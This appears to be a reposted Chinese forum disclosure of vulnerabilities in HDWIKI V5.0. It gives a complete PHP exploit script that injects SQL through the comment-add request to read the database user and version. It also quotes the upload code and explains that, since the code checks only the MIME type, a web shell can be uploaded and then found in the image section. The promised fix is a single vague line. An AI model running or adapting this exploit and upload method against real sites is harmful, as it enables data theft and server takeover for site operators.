HDWIKI V5.0 基本上没有对输入的变量进行过滤,存在多个sql注入漏洞

贴一个发表评论的地方的注入代码

<?php
error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$POSTDATA='comment=ddddddddddddd&c_class=0&re_id=0&anonymity=0&code=undefined';

echo $html = send($POSTDATA);

function send($cmd) {
    global $host,$path;
    $message = "POST $path/index.php?comment-add-2,(select/**/concat(user(),0x5f,version())),1,1,1,1),(1 HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: ".$host."\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: ".$host."\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n";
    $message .= "Cookie: kaiyuan_tip_date=2%2C11; hd_sid=OBIyML; hd_auth=768anzIskveAg6VFdx6L41XBHI%2Be0Xofs%2BfBr4E%2Fj7Wh%2BEkYJRzFdHzMp4uMwA6IqIVhfWwR6CD267coIdhV\r\n\r\n";
    $message .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}可执行文件上传漏洞

attachement.php 上传文件的代码

function douploadimg() {
        $imgname=$_FILES['photofile']['name'];
        $extname=file::extname($imgname);
        $destfile=$_ENV['attachment']->makepath($extname);
        $arrupload=file::uploadfile($_FILES['photofile'],$destfile);
        ……涉及的几个函数

function extname($filename){
        $pathinfo=pathinfo($filename);
        return strtolower($pathinfo['extension']);
    }

function makepath($extname,$format='Ym'){
        return 'uploads/'.gmdate($format, $this->base->time + $this->base->setting['time_offset'])."/{$this->base->time}".util::random(8).'.'.strtolower($extname);
    }

function uploadfile($attachment,$target,$maxsize=1024,$is_image=1){
        $result=array ('result'=>false,'msg'=>'upload mistake');
        if($is_image){
            $attach=$attachment;
            $filesize=$attach['size']/1024;
            if(0==$filesize){
                $result['msg'] = '&#19978;&#20256;&#38169;&#35823;';
                return $result;
            }
            if(substr($attach['type'],0,6)!='image/'){//仅仅依靠type来判断文件类型
                $result['msg'] ='&#26684;&#24335;&#38169;&#35823;';
                return $result;
            }
            if($filesize>$maxsize){
                $result['msg'] ='&#25991;&#20214;&#36807;&#22823;';
                return $result;
            }
        }else{
            $attach['tmp_name']=$attachment;
        }
        $filedir=dirname($target);
        file::forcemkdir($filedir);
        if(@copy($attach['tmp_name'],$target) || @move_uploaded_file($attach['tmp_name'],$target)){
            $result['result']=true;
            $result['msg'] ='&#19978;&#20256;&#25104;&#21151;';
        }
        ……
    }

传过了以后,在图片百科中可以看到shell地址

摘自http://bbs.wolvez.org/viewtopic.php?id=208

www.2cto.com提供修复：

针对上述问题代码过滤